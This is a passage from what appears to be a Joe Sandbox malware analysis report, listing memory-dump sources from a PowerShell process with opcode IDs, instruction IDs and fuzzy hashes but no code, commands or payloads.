                                                                • Instruction ID: 87136ef219e284d03e687a9e20fdf2eb7638ba5909c63a2861cb3f14ae471a72
                                                                • Opcode Fuzzy Hash: 2b41d0af2b17e13572e04530705f527368211b07cfb8bcc709c7e438bff5be17
                                                                • Instruction Fuzzy Hash: A5319C74B10204AFE7049F64C811BAEB7A3AFC5705F14C029E9166FB91CF7A9C018BA6
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781160629.0000000009810000.00000040.00000800.00020000.00000000.sdmp, Offset: 09810000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9810000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1260dc24a96c9934c897fe3a5958684255d2f09563500c9b33cbd1d376ba2625
                                                                • Instruction ID: 1a6643de978df7d9e86018d80afd654b501641babb214ffb10ceefe4b9960adc
                                                                • Opcode Fuzzy Hash: 1260dc24a96c9934c897fe3a5958684255d2f09563500c9b33cbd1d376ba2625
                                                                • Instruction Fuzzy Hash: CC213BB0B08309DFDB20DE25840977D77A99F95748F15802DEB05DBB88DB39C940C392
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 1c517ac8dc4fa46cc9fb2b2aa2709a5db649aae8091ee89a421cd4ee99e80dcb
                                                                • Instruction ID: 6c14299dd08228af9bf5e6b66a6109976407c30491ce95905af5e4f7e9429c3b
                                                                • Opcode Fuzzy Hash: 1c517ac8dc4fa46cc9fb2b2aa2709a5db649aae8091ee89a421cd4ee99e80dcb
                                                                • Instruction Fuzzy Hash: C72137F6A04356FFCF358B28C9401AABFF0AF961107198197DC68EB242E7319904D7E1
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: db7681aec25996bda119089d19251a83e4b012d50072691693e911c4057ed806
                                                                • Instruction ID: 6f94d354ef90fa3df31a1c17829303f4bbc8eecf56cbabb96932b6a7c3f85d44